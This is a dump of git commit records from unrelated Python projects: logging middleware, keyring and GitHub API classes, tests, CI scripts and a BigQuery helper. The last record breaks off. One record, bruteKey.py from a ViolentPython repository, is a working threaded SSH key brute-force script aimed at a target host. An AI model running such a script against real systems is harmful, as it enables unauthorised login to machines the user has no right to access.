commit | subject | repos | old_file | new_file | new_contents | old_contents | license | lang
---|---|---|---|---|---|---|---|---
411751a10ece8b84bb122422b8d58f22710731aa | Fix typo | wizeline/relayer | relayer/flask/logging_middleware.py | relayer/flask/logging_middleware.py | from datetime import datetime
class LoggingMiddleware(object):
def __init__(self, app, wsgi_app, context, logging_topic):
self.app = app
self.wsgi_app = wsgi_app
self.context = context
self.logging_topic = logging_topic
def __call__(self, environ, start_response):
with self.app.app_context():
start_time = datetime.utcnow()
status_code = None
content_length = None
self.context.start_request()
def logging_start_response(status, response_headers, exc_info=None):
nonlocal status_code, content_length
status_code = int(status.partition(' ')[0])
for name, value in response_headers:
if name.lower() == 'content-length':
content_length = int(value)
break
return start_response(status, response_headers, exc_info)
response = self.wsgi_app(environ, logging_start_response)
if content_length is None:
content_length = len(b''.join(response))
elapsed_time = datetime.utcnow() - start_time
elapsed_time_milliseconds = elapsed_time.microseconds / 1000.0 + elapsed_time.seconds * 1000
request_log = {
'date': start_time.isoformat(),
'user_agent': environ.get('HTTP_USER_AGENT'),
'method': environ.get('REQUEST_METHOD'),
'path': environ.get('PATH_INFO'),
'query_string': environ.get('QUERY_STRING'),
'remote_addr': environ.get('X_REAL_IP', environ.get('REMOTE_ADDR')),
'x_forwarded_for': environ.get('X_FORWARDED_FOR'),
'status': status_code,
'content_length': content_length,
'request_time': elapsed_time_milliseconds
}
self.context.end_request(self.logging_topic, request_log)
return response
| from datetime import datetime
class LoggingMiddleware(object):
def __init__(self, app, wsgi_app, context, logging_topic):
self.app = app
self.wsgi_app = wsgi_app
self.context = context
self.logging_topic = logging_topic
def __call__(self, environ, start_response):
with self.app.app_context():
start_time = datetime.utcnow()
status_code = None
content_length = None
self.context.start_request()
def logging_start_response(status, response_headers, exc_info=None):
nonlocal status_code, content_length
status_code = int(status.partition(' ')[0])
for name, value in response_headers:
if name.lower() == 'content-length':
content_length = int(value)
break
return start_response(status, response_headers, exc_info)
response = self.wsgi_app(environ, logging_start_response)
if content_length is None:
content_length = len(b''.join(response))
elapsed_time = datetime.utcnow() - start_time
elapsed_time_milliseconds = elapsed_time.microseconds / 1000.0 + elapsed_time.seconds * 1000
request_log = {
'date': start_time.isoformat(),
'user_agent': environ.get('HTTP_USER_AGENT'),
'method': environ.get('REQUEST_METHOD'),
'path': environ.get('PATH_INFO'),
'query_string': environ.get('QUERY_STRING'),
'remote_addr': environ.get('X_REAL_IP', environ.get('REMOTE_ADDR')),
'x_forwarded_for': environ.get('X_Forwarded_For'),
'status': status_code,
'content_length': content_length,
'request_time': elapsed_time_milliseconds
}
self.context.end_request(self.logging_topic, request_log)
return response
| mit | Python |
911e961f189967554bc5a046f022bb1c394cc119 | Debug and test before finishing. p50-52 | n1cfury/ViolentPython | bruteKey.py | bruteKey.py | #!/usr/bin/env python
import pexpect, optparse, os
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
usage = "Example: bruteKey.py -H <target> -u <user name> -d <directory> "
def banner():
print "##### SSH Weak Key Exploit #######"
print usage
print""
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh '+user+'@'+host+' -i'+keyfile+opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. '+str(keyfile)
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage: %prog -H '+'target host -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-d', dest='passDir', type='string', help='specify directory with keys')
parser.add_option('-u', dest='user', type='string', help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user =options.user
if host == None or passDir == None or user == None:
print parser.usage
exit(0)
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: '+'Too Many Connections Closed by Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
connection_lock.acquire()
fullpath = os.path.join(passDir, filename)
print '[-] Testing Keyfile '+str(fullpath)
t = Thread(target=connect, args =(user, host, fullpath, True))
child = t.start()
if __name__ == '__main__':
main() | #!/usr/bin/env python
import pexpect, optparse, os
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
usage = "Example: bruteKey.py -H <target> -u <user name> -d <directory> "
def banner():
print "##### SSH Weak Key Exploit #######"
print usage
print""
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh '+user+'@'+host+' -i'+keyfile+opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. '+str(keyfile)
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage: %prog -H '+'target host -u <user> -d <directory>')
parser.
if __name__ == '__main__':
main() | mit | Python |
f3578096219dbb82572063c8a6dbb75be4da07ac | Update P03_combinePDFs fixed reading encrypted files | JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials | books/AutomateTheBoringStuffWithPython/Chapter13/P03_combinePDFs.py | books/AutomateTheBoringStuffWithPython/Chapter13/P03_combinePDFs.py | #! python3
# combinePdfs.py - Combines all the PDFs in the current working directory into
# a single PDF.
import PyPDF4, os
# Get all the PDF filenames.
pdfFiles = []
for filename in os.listdir('.'):
if filename.endswith(".pdf"):
pdfFiles.append(filename)
pdfFiles.sort(key=str.lower)
pdfWriter = PyPDF4.PdfFileWriter()
# Loop through all the PDF files.
for filename in pdfFiles:
pdfFileObj = open(filename, "rb")
pdfReader = PyPDF4.PdfFileReader(pdfFileObj)
if pdfReader.isEncrypted and filename == "encrypted.pdf":
pdfReader.decrypt("rosebud")
if pdfReader.isEncrypted and filename == "encryptedminutes.pdf":
pdfReader.decrypt("swordfish")
# Loop through all the pages (except the first) and add them.
for pageNum in range(1, pdfReader.numPages):
pageObj = pdfReader.getPage(pageNum)
pdfWriter.addPage(pageObj)
# Save the resulting PDF to a file.
pdfOutput = open("allminutes.pdf", "wb")
pdfWriter.write(pdfOutput)
pdfOutput.close()
| #! python3
# combinePdfs.py - Combines all the PDFs in the current working directory into
# a single PDF.
import PyPDF4, os
# Get all the PDF filenames.
pdfFiles = []
for filename in os.listdir('.'):
if filename.endswith(".pdf"):
pdfFiles.append(filename)
pdfFiles.sort(key=str.lower)
pdfWriter = PyPDF4.PdfFileWriter()
# Loop through all the PDF files.
for filename in pdfFiles:
pdfFileObj = open(filename, "rb")
pdfReader = PyPDF4.PdfFileReader(pdfFileObj)
# Loop through all the pages (except the first) and add them.
for pageNum in range(1, pdfReader.numPages):
pageObj = pdfReader.getPage(pageNum)
pdfWriter.addPage(pageObj)
# Save the resulting PDF to a file.
pdfOutput = open("allminutes.pdf", "wb")
pdfWriter.write(pdfOutput)
pdfOutput.close()
| mit | Python |
26ce46c14f3fc5d38253617822974c21b488dd95 | Set priority to 0, set viability to permanently null. Add test to ensure keyring can render itself. Ref #358. | jaraco/keyring | keyring/backends/chainer.py | keyring/backends/chainer.py | """
Implementation of a keyring backend chainer.
This is specifically not a viable backend, and must be
instantiated directly with a list of ordered backends.
"""
from __future__ import absolute_import
from ..backend import KeyringBackend
class ChainerBackend(KeyringBackend):
"""
>>> ChainerBackend(())
<keyring.backends.chainer.ChainerBackend object at ...>
"""
priority = 0
viable = False
def __init__(self, backends):
self.backends = list(backends)
def get_password(self, service, username):
for backend in self.backends:
password = backend.get_password(service, username)
if password is not None:
return password
def set_password(self, service, username, password):
for backend in self.backends:
try:
return backend.set_password(service, username, password)
except NotImplementedError:
pass
def delete_password(self, service, username):
for backend in self.backends:
try:
return backend.delete_password(service, username)
except NotImplementedError:
pass
def get_credential(self, service, username):
for backend in self.backends:
credential = backend.get_credential(service, username)
if credential is not None:
return credential
| """
Implementation of a keyring backend chainer.
This is specifically not a viable backend, and must be
instantiated directly with a list of ordered backends.
"""
from __future__ import absolute_import
from ..backend import KeyringBackend
class ChainerBackend(KeyringBackend):
def __init__(self, backends):
self.backends = list(backends)
def get_password(self, service, username):
for backend in self.backends:
password = backend.get_password(service, username)
if password is not None:
return password
def set_password(self, service, username, password):
for backend in self.backends:
try:
return backend.set_password(service, username, password)
except NotImplementedError:
pass
def delete_password(self, service, username):
for backend in self.backends:
try:
return backend.delete_password(service, username)
except NotImplementedError:
pass
def get_credential(self, service, username):
for backend in self.backends:
credential = backend.get_credential(service, username)
if credential is not None:
return credential
| mit | Python |
56598776ce6588445cf0d76b5faaea507d5d1405 | Update Labels for consistency | sigmavirus24/github3.py | github3/issues/label.py | github3/issues/label.py | # -*- coding: utf-8 -*-
"""Module containing the logic for labels."""
from __future__ import unicode_literals
from json import dumps
from ..decorators import requires_auth
from ..models import GitHubCore
class Label(GitHubCore):
"""A representation of a label object defined on a repository.
See also: http://developer.github.com/v3/issues/labels/
This object has the following attributes::
.. attribute:: color
The hexadecimeal representation of the background color of this label.
.. attribute:: name
The name (display label) for this label.
"""
def _update_attributes(self, label):
self._api = label['url']
self.color = label['color']
self.name = label['name']
self._uniq = self._api
def _repr(self):
return '<Label [{0}]>'.format(self)
def __str__(self):
return self.name
@requires_auth
def delete(self):
"""Delete this label.
:returns:
True if successfully deleted, False otherwise
:rtype:
bool
"""
return self._boolean(self._delete(self._api), 204, 404)
@requires_auth
def update(self, name, color):
"""Update this label.
:param str name:
(required), new name of the label
:param str color:
(required), color code, e.g., 626262, no leading '#'
:returns:
True if successfully updated, False otherwise
:rtype:
bool
"""
json = None
if name and color:
if color[0] == '#':
color = color[1:]
json = self._json(self._patch(self._api, data=dumps({
'name': name, 'color': color})), 200)
if json:
self._update_attributes(json)
return True
return False
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from json import dumps
from ..decorators import requires_auth
from ..models import GitHubCore
class Label(GitHubCore):
"""The :class:`Label <Label>` object. Succintly represents a label that
exists in a repository.
See also: http://developer.github.com/v3/issues/labels/
"""
def _update_attributes(self, label):
self._api = self._get_attribute(label, 'url')
#: Color of the label, e.g., 626262
self.color = self._get_attribute(label, 'color')
#: Name of the label, e.g., 'bug'
self.name = self._get_attribute(label, 'name')
self._uniq = self._api
def _repr(self):
return '<Label [{0}]>'.format(self)
def __str__(self):
return self.name
@requires_auth
def delete(self):
"""Delete this label.
:returns: bool
"""
return self._boolean(self._delete(self._api), 204, 404)
@requires_auth
def update(self, name, color):
"""Update this label.
:param str name: (required), new name of the label
:param str color: (required), color code, e.g., 626262, no leading '#'
:returns: bool
"""
json = None
if name and color:
if color[0] == '#':
color = color[1:]
json = self._json(self._patch(self._api, data=dumps({
'name': name, 'color': color})), 200)
if json:
self._update_attributes(json)
return True
return False
| bsd-3-clause | Python |
9626736dc94c85987472b7d7ad5951363883a5dc | Disable Facter plugin if yaml import fails | pombredanne/jsonstats,RHInception/jsonstats,RHInception/jsonstats,pombredanne/jsonstats | JsonStats/FetchStats/Plugins/Facter.py | JsonStats/FetchStats/Plugins/Facter.py | import datetime
from JsonStats.FetchStats import Fetcher
import os.path
class Facter(Fetcher):
"""
Facter plugin for `jsonstats`. Returns key-value pairs of general
system information provided by the `facter` command.
Load conditions:
* Plugin will load if the `facter` command is found
Operating behavior:
* Plugin will call `facter` with the `-p` (return `puppet` facts)
option if the `puppet` command is on the system.
Dependencies:
* Facter - http://puppetlabs.com/blog/facter-part-1-facter-101
* PyYAML - http://pyyaml.org/wiki/PyYAML
Optional dependencies:
* Puppet - http://puppetlabs.com/puppet/what-is-puppet
"""
try:
import yaml
except ImportError:
yaml = None
def __init__(self):
self.context = 'facter'
self._cmd = 'facter --yaml 2>/dev/null'
if self.yaml is None:
self._loaded(False, msg='No module named yaml')
return
if os.path.exists('/usr/bin/puppet'):
self._cmd = 'facter -p --yaml 2>/dev/null'
self._load_data()
def _load_data(self):
self._refresh_time = datetime.datetime.utcnow()
try:
output = self._exec(self._cmd)
self.facts = self.yaml.load(output)
self._loaded(True)
except OSError, e:
# Couldn't find facter command, most likely
self._loaded(False, msg=str(e))
except Exception, e:
# Something else did indeed go wrong
self._loaded(False, msg=str(e))
def dump(self):
# poor mans cache, refresh cache in an hour
if (datetime.datetime.utcnow() -
datetime.timedelta(minutes=5)) > self._refresh_time:
self._load_data()
return self.facts
def dump_json(self):
return self.json.dumps(self.dump())
| import datetime
from JsonStats.FetchStats import Fetcher
import os.path
class Facter(Fetcher):
"""
Facter plugin for `jsonstats`. Returns key-value pairs of general
system information provided by the `facter` command.
Load conditions:
* Plugin will load if the `facter` command is found
Operating behavior:
* Plugin will call `facter` with the `-p` (return `puppet` facts)
option if the `puppet` command is on the system.
Dependencies:
* Facter - http://puppetlabs.com/blog/facter-part-1-facter-101
Optional dependencies:
* Puppet - http://puppetlabs.com/puppet/what-is-puppet
"""
import yaml
def __init__(self):
self.context = 'facter'
self._cmd = 'facter --yaml 2>/dev/null'
if os.path.exists('/usr/bin/puppet'):
self._cmd = 'facter -p --yaml 2>/dev/null'
self._load_data()
def _load_data(self):
self._refresh_time = datetime.datetime.utcnow()
try:
output = self._exec(self._cmd)
self.facts = self.yaml.load(output)
self._loaded(True)
except OSError, e:
# Couldn't find facter command, most likely
self._loaded(False, msg=str(e))
except Exception, e:
# Something else did indeed go wrong
self._loaded(False, msg=str(e))
def dump(self):
# poor mans cache, refresh cache in an hour
if (datetime.datetime.utcnow() -
datetime.timedelta(minutes=5)) > self._refresh_time:
self._load_data()
return self.facts
def dump_json(self):
return self.json.dumps(self.dump())
| mit | Python |
764f785bfa34d99dc2633db78a0d80407e401993 | Implement a client instance | liberation/zuora-client | zuora/client.py | zuora/client.py | """
Client for Zuora SOAP API
"""
# TODO:
# - Handle debug
# - Handle error
# - Session policy
import os
from suds.client import Client
from suds.sax.element import Element
from zuora.transport import HttpTransportWithKeepAlive
class ZuoraException(Exception):
"""
Base Zuora Exception.
"""
pass
class Zuora(object):
"""
SOAP Client based on Suds
"""
def __init__(self, wsdl, login, password):
self.wsdl = wsdl
self.login = login
self.password = password
self.session = None
self.wsdl_path = 'file://%s' % os.path.abspath(self.wsdl)
self.client = Client(
self.wsdl_path,
transport=HttpTransportWithKeepAlive())
def __str__(self):
return self.client.__str__()
| """
Client for Zuora SOAP API
"""
# TODO:
# - Handle debug
# - Handle error
# - Session policy
from suds.client import Client
from suds.sax.element import Element
class ZuoraException(Exception):
"""
Base Zuora Exception.
"""
pass
class Zuora(object):
"""
SOAP Client based on Suds
"""
def __init__(self, wsdl, login, password):
self.wsdl = wsdl
self.login = login
self.password = password
| bsd-3-clause | Python |
88206513d4a04a99832ac8461a3209b2d1d7d2c8 | make test work | mkuiack/tkp,transientskp/tkp,mkuiack/tkp,bartscheers/tkp,bartscheers/tkp,transientskp/tkp | tests/test_quality/test_restoringbeam.py | tests/test_quality/test_restoringbeam.py | import os
import unittest2 as unittest
from tkp.quality.restoringbeam import beam_invalid
from tkp.testutil.decorators import requires_data
from tkp import accessors
from tkp.testutil.data import DATAPATH
fits_file = os.path.join(DATAPATH,
'quality/noise/bad/home-pcarrol-msss-3C196a-analysis-band6.corr.fits')
@requires_data(fits_file)
class TestRestoringBeam(unittest.TestCase):
def test_header(self):
image = accessors.open(fits_file)
(semimaj, semimin, theta) = image.beam
self.assertFalse(beam_invalid(semimaj, semimin, theta))
# TODO: this is for FOV calculation and checking
#data = tkp.quality.restoringbeam.parse_fits(image)
#frequency = image.freq_eff
#wavelength = scipy.constants.c/frequency
#d = 32.25
#fwhm = tkp.lofar.beam.fwhm(wavelength, d)
#fov = tkp.lofar.beam.fov(fwhm)
def test_infinite(self):
smaj, smin, theta = float('inf'), float('inf'), float('inf')
self.assertTrue(beam_invalid(smaj, smin, theta))
if __name__ == '__main__':
unittest.main()
| import os
import unittest2 as unittest
from tkp.quality.restoringbeam import beam_invalid
from tkp.testutil.decorators import requires_data
from tkp import accessors
from tkp.testutil.data import DATAPATH
fits_file = os.path.join(DATAPATH,
'quality/noise/bad/home-pcarrol-msss-3C196a-analysis-band6.corr.fits')
@requires_data(fits_file)
class TestRestoringBeam(unittest.TestCase):
def test_header(self):
image = accessors.open(fits_file)
(semimaj, semimin, theta) = image.beam
self.assertFalse(beam_invalid(semimaj, semimin))
# TODO: this is for FOV calculation and checking
#data = tkp.quality.restoringbeam.parse_fits(image)
#frequency = image.freq_eff
#wavelength = scipy.constants.c/frequency
#d = 32.25
#fwhm = tkp.lofar.beam.fwhm(wavelength, d)
#fov = tkp.lofar.beam.fov(fwhm)
def test_infinite(self):
smaj, smin, theta = float('inf'), float('inf'), float('inf')
self.assertTrue(beam_invalid(smaj, smin, theta))
if __name__ == '__main__':
unittest.main()
| bsd-2-clause | Python |
716ffae543838af6de7b83723ac6048a9f8f390a | improve test list latest articles | eliostvs/django-kb,eliostvs/django-kb | knowledge/tests/tests_views.py | knowledge/tests/tests_views.py | from __future__ import unicode_literals
from model_mommy import mommy
from knowledge.base import choices
from knowledge.base.test import ViewTestCase
from knowledge.models import Article
class HomepageTestCase(ViewTestCase):
from knowledge.views import Homepage
view_class = Homepage
view_name = 'knowledge:homepage'
def setUp(self):
self.category = mommy.make_recipe('knowledge.tests.category_with_articles')
mommy.make_recipe('knowledge.tests.category_without_articles')
for article in Article.objects.published():
article.votes.add(token=article.id, rate=choices.VoteChoice.Upvote)
def test_category_list(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['category_list'], [self.category])
def test_have_a_search_form_on_context(self):
from knowledge.forms import SimpleSearchForm
response = self.get()
self.assertEqual(response.context_data['search_form'], SimpleSearchForm)
def test_list_latest_articles(self):
articles = mommy.make_recipe('knowledge.tests.published_article',
category=self.category,
_quantity=5)
response = self.get()
self.assertHttpOK(response)
self.assertEqual(Article.objects.count(), 7)
self.assertSeqEqual(response.context_data['new_articles'], articles)
def test_list_top_viewed_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['new_articles'], Article.objects.published())
def test_list_top_rated_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['top_viewed_articles'], Article.objects.published())
| from __future__ import unicode_literals
from model_mommy import mommy
from knowledge.base import choices
from knowledge.base.test import ViewTestCase
from knowledge.models import Article
class HomepageTestCase(ViewTestCase):
from knowledge.views import Homepage
view_class = Homepage
view_name = 'knowledge:homepage'
def setUp(self):
self.category = mommy.make_recipe('knowledge.tests.category_with_articles')
mommy.make_recipe('knowledge.tests.category_without_articles')
for article in Article.objects.published():
article.votes.add(token=article.id, rate=choices.VoteChoice.Upvote)
def test_category_list(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['category_list'], [self.category])
def test_have_a_search_form_on_context(self):
from knowledge.forms import SimpleSearchForm
response = self.get()
self.assertEqual(response.context_data['search_form'], SimpleSearchForm)
def test_count_published_articles(self):
response = self.get()
category_list = response.context_data['category_list']
self.assertHttpOK(response)
self.assertEqual(category_list[0].get_articles_count(), 1)
def test_list_latest_published_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['new_articles'], Article.objects.published())
def test_list_top_viewed_published_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['new_articles'], Article.objects.published())
def test_list_top_rated_published_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['top_viewed_articles'], Article.objects.published())
| bsd-3-clause | Python |
c69ac39ee650445533d31a4a476f6f3b14cb43ca | Update roles.py | mikelambson/tcid,mikelambson/tcid,mikelambson/tcid,mikelambson/tcid | site/models/roles.py | site/models/roles.py | import datetime, re;
from sqlalchemy.orm import validates;
from server import DB, FlaskServer;
class Roles(DB.Model):
id = DB.Column(DB.Integer, primary_key=True, autoincrement=True);
name = DB.Column(DB.String(20));
district_id = DB.relationship(DB.Integer, DB.ForeignKey('district.id'));
created_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'));
created_at = DB.Column(DB.DateTime);
updated_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'));
updated_at = DB.Column(DB.DateTime, nullable=True);
def __init__(self, name, created_at, updated_at):
self.name = name;
self.created_at = datetime.datetime.now();
self.updated_at = self.created_at;
| import datetime, re;
from sqlalchemy.orm import validates;
from server import DB, FlaskServer;
class Roles(DB.Model):
id = DB.Column(DB.Integer, primary_key=True, autoincrement=True);
name = DB.Column(DB.String(20));
district_id = DB.relationship(DB.Integer, DB.ForeignKey('district.id'));
created_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'));
created_at = DB.Column(DB.DateTime);
updated_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'), nullable=True);
updated_at = DB.Column(DB.DateTime, nullable=True);
def __init__(self, name, created_at, updated_at):
self.name = name;
self.created_at = datetime.datetime.now();
self.updated_at = self.created_at;
| bsd-3-clause | Python |
ea542282911cbc7b3cf594a20175fbddcbd75a89 | Use absolute import | mxreppy/restapi-logging-handler,narwhaljames/restapi-logging-handler | restapi_logging_handler/__init__.py | restapi_logging_handler/__init__.py | from __future__ import absolute_import
from restapi_logging_handler.loggly_handler import LogglyHandler
from restapi_logging_handler.restapi_logging_handler import RestApiHandler
| from loggly_handler import LogglyHandler
from restapi_logging_handler import RestApiHandler
| mit | Python |
128c54529da80d5f84a0bf8a9bca6e83ed14a342 | Delete unused import | thombashi/SimpleSQLite,thombashi/SimpleSQLite | simplesqlite/loader/html/formatter.py | simplesqlite/loader/html/formatter.py | # encoding: utf-8
"""
.. codeauthor:: Tsuyoshi Hombashi <[email protected]>
"""
from __future__ import absolute_import
import bs4
import dataproperty
from ..constant import TableNameTemplate as tnt
from ..data import TableData
from ..formatter import TableFormatter
class HtmlTableFormatter(TableFormatter):
def __init__(self, source_data):
super(HtmlTableFormatter, self).__init__(source_data)
try:
self.__soup = bs4.BeautifulSoup(self._source_data, "lxml")
except bs4.FeatureNotFound:
self.__soup = bs4.BeautifulSoup(self._source_data, "html.parser")
def to_table_data(self):
self._validate_source_data()
for table in self.__soup.find_all("table"):
tabledata = self.__parse_html(table)
yield tabledata
def _make_table_name(self):
table_name = self._loader.make_table_name()
key = self.__table_id
if dataproperty.is_empty_string(key):
key = "{:s}{:d}".format(
self._loader.format_name,
self._loader.get_format_table_count())
return table_name.replace(tnt.KEY, key)
def __parse_html(self, table):
header_list = []
data_matrix = []
self.__table_id = table.get("id")
row_list = table.find_all("tr")
for row in row_list:
col_list = row.find_all("td")
if dataproperty.is_empty_sequence(col_list):
th_list = row.find_all("th")
if dataproperty.is_empty_sequence(th_list):
continue
header_list = [row.text.strip() for row in th_list]
continue
data_list = [value.text.strip() for value in col_list]
data_matrix.append(data_list)
self._loader.inc_table_count()
return TableData(
self._make_table_name(), header_list, data_matrix)
| # encoding: utf-8
"""
.. codeauthor:: Tsuyoshi Hombashi <[email protected]>
"""
from __future__ import absolute_import
import bs4
import dataproperty
from ..constant import TableNameTemplate as tnt
from ..data import TableData
from ..error import InvalidDataError
from ..formatter import TableFormatter
class HtmlTableFormatter(TableFormatter):
def __init__(self, source_data):
super(HtmlTableFormatter, self).__init__(source_data)
try:
self.__soup = bs4.BeautifulSoup(self._source_data, "lxml")
except bs4.FeatureNotFound:
self.__soup = bs4.BeautifulSoup(self._source_data, "html.parser")
def to_table_data(self):
self._validate_source_data()
for table in self.__soup.find_all("table"):
tabledata = self.__parse_html(table)
yield tabledata
def _make_table_name(self):
table_name = self._loader.make_table_name()
key = self.__table_id
if dataproperty.is_empty_string(key):
key = "{:s}{:d}".format(
self._loader.format_name,
self._loader.get_format_table_count())
return table_name.replace(tnt.KEY, key)
def __parse_html(self, table):
header_list = []
data_matrix = []
self.__table_id = table.get("id")
row_list = table.find_all("tr")
for row in row_list:
col_list = row.find_all("td")
if dataproperty.is_empty_sequence(col_list):
th_list = row.find_all("th")
if dataproperty.is_empty_sequence(th_list):
continue
header_list = [row.text.strip() for row in th_list]
continue
data_list = [value.text.strip() for value in col_list]
data_matrix.append(data_list)
self._loader.inc_table_count()
return TableData(
self._make_table_name(), header_list, data_matrix)
| mit | Python |
7f02d1f2b23bbf27e99d87ef23c491823875c3d1 | fix bin none subprocess.TimeoutExpired | le9i0nx/ansible-role-test | bin/virt.py | bin/virt.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import yaml
import subprocess
import os
import sys
def proc(cmd,time = 120,sh = True ):
print("$".format(cmd))
p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=sh)
outs, errs = p.communicate(timeout=time)
return outs,errs,p
ROOT_PATH=os.path.dirname(__file__)
print(proc("sudo apt-get update")[0])
print(proc("sudo apt-get install -qq sshpass")[0])
print(proc("ssh-keygen -b 2048 -t rsa -f $HOME/.ssh/id_rsa -q -N \"\"")[0])
print(proc("docker info")[0])
print(proc("docker version")[0])
with open('meta/main.yml', 'r') as f:
doc = yaml.load(f)
for i in doc["galaxy_info"]["platforms"]:
distrib = i["name"]
for x in i["versions"]:
dockerfile = "{}/../dockerfile/{}/{}/Dockerfile".format(ROOT_PATH,distrib,x)
if os.path.exists(dockerfile):
print(proc("docker build -f {} -t {}_{} .".format(dockerfile,distrib,x))[0])
print(proc("docker run -d --cap-add=SYS_ADMIN -it -v /sys/fs/cgroup:/sys/fs/cgroup:ro {}_{}".format(distrib,x))[0])
else:
print("Critical error. Not found docker files {}".format(dockerfile))
sys.exit(1)
proc("sleep 10")
proc("docker inspect --format '{{.Config.Image}} ansible_ssh_host={{.NetworkSettings.IPAddress}}' `docker ps -q` >> /etc/ansible/hosts")
for item in proc("docker inspect --format '{{ .NetworkSettings.IPAddress }}' \`docker ps -q\`")[0]:
proc("ssh-keyscan -H {} >> ~/.ssh/known_hosts".format(item))
proc("sshpass -p '000000' ssh-copy-id root@{}".format(item))
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import yaml
import subprocess
import os
import sys
def proc(cmd,time = 120,sh = True ):
print("$".format(cmd))
p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=sh)
try:
outs, errs = p.communicate(timeout=time)
except subprocess.TimeoutExpired:
p.kill()
outs, errs = p.communicate()
return outs,errs,p
ROOT_PATH=os.path.dirname(__file__)
print(proc("sudo apt-get update")[0])
print(proc("sudo apt-get install -qq sshpass")[0])
print(proc("ssh-keygen -b 2048 -t rsa -f $HOME/.ssh/id_rsa -q -N \"\"")[0])
print(proc("docker info")[0])
print(proc("docker version")[0])
with open('meta/main.yml', 'r') as f:
doc = yaml.load(f)
for i in doc["galaxy_info"]["platforms"]:
distrib = i["name"]
for x in i["versions"]:
dockerfile = "{}/../dockerfile/{}/{}/Dockerfile".format(ROOT_PATH,distrib,x)
if os.path.exists(dockerfile):
print(proc("docker build -f {} -t {}_{} .".format(dockerfile,distrib,x))[0])
print(proc("docker run -d --cap-add=SYS_ADMIN -it -v /sys/fs/cgroup:/sys/fs/cgroup:ro {}_{}".format(distrib,x))[0])
else:
print("Critical error. Not found docker files {}".format(dockerfile))
sys.exit(1)
proc("sleep 10")
proc("docker inspect --format '{{.Config.Image}} ansible_ssh_host={{.NetworkSettings.IPAddress}}' `docker ps -q` >> /etc/ansible/hosts")
for item in proc("docker inspect --format '{{ .NetworkSettings.IPAddress }}' \`docker ps -q\`")[0]:
proc("ssh-keyscan -H {} >> ~/.ssh/known_hosts".format(item))
proc("sshpass -p '000000' ssh-copy-id root@{}".format(item))
| mit | Python |
45e9ddce96b4fdadca63a50bf2808c7f98520d99 | print query on error | isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc | data_upload/util/bq_wrapper.py | data_upload/util/bq_wrapper.py | '''
Created on Jan 22, 2017
Copyright 2017, Institute for Systems Biology.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: michael
'''
from google.cloud import bigquery
def query_bq_table(query, use_legacy, project, log):
log.info('\t\tquerying bq: %s' % query)
client = bigquery.Client(project=project)
query_results = client.run_sync_query(query)
# Use standard SQL syntax for queries.
# See: https://cloud.google.com/bigquery/sql-reference/
query_results.use_legacy_sql = use_legacy
try:
query_results.run()
except:
log.exception('problem with query:\n{}'.format(query))
raise
log.info('\t\tdone querying bq: %s' % query)
return query_results
def fetch_paged_results(query_results, fetch_count, project_name, page_token, log):
log.info('\t\trequesting %d rows %s' % (fetch_count, (' for ' + project_name) if project_name else ''))
rows, total_rows, page_token = query_results.fetch_data(
max_results=fetch_count,
page_token=page_token)
log.info('\t\tfetched %d rows %s' % (len(rows), (' for ' + project_name) if project_name else ''))
return total_rows, rows, page_token
| '''
Created on Jan 22, 2017
